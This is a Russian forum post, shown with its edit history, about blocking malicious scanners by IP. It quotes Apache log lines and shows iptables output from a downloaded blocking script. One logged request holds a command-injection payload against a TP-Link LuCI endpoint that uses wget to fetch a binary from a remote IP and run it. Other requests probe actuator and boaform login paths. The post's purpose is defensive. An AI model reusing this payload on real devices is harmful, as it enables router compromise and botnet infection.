История изменений
Исправление demo13, (текущая версия) :
Может попробовать блокировать по IP злобного сервера?
Как пример… смотрим логи /var/log/apache2/access_log и видим такую картину:
195.1.144.109 - - [02/May/2024:11:41:52 +0200] «GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk
) HTTP/1.1» 403 975 «-» «Go-http-client/1.1»
83.97.73.245 - - [02/May/2024:13:00:13 +0200] «GET /actuator/gateway/routes HTTP/1.1» 404 985 «-» "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78
185.94.29.162 - - [06/Apr/2024:03:14:42 +0200] «POST /boaform/admin/formLogin HTTP/1.1» 404 1148 «http://87.189.84.104:80/admin/login.asp» «Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0»
выбраем по каким параметрам ( на пример - «boaform», «cgi-bin», «actuator» или по другим) блокировать IP злобного сервера! … см. /var/log/apache2/access_log
195.1.144.109, 83.97.73.245 и 185.94.29.162
скрипт берём отсюда: http://togusak.ddnss.de/web/ipblock.sh
запускаем скрипт:
server:~ # chmod +x ipblock.sh
server:~ # ipblock.sh start
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:https
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:http
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:https
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:http
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:https
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
server:~ # ipblock.sh stop
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Исходная версия demo13, :
Может попробовать блокировать по IP злобного сервера?
Как пример… смотрим логи /var/log/apache2/access_log и видим такую картину:
195.1.144.109 - - [02/May/2024:11:41:52 +0200] «GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk
) HTTP/1.1» 403 975 «-» «Go-http-client/1.1»
83.97.73.245 - - [02/May/2024:13:00:13 +0200] «GET /actuator/gateway/routes HTTP/1.1» 404 985 «-» "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78
185.94.29.162 - - [06/Apr/2024:03:14:42 +0200] «POST /boaform/admin/formLogin HTTP/1.1» 404 1148 «http://87.189.84.104:80/admin/login.asp» «Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0»
выбраем по каким параметрам ( на пример - «boaform», «cgi-bin», «actuator» или по другим) блокировать IP злобного сервера! … см. /var/log/apache2/access_log
195.1.144.109, 83.97.73.245 и 185.94.29.162
скрипт берём отсюда: http://togusak.ddnss.de/web/ipblock.sh
запускаем скрипт:
server:~ # ipblock.sh start
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:https
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:http
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:https
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:http
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:https
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
server:~ # ipblock.sh stop
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination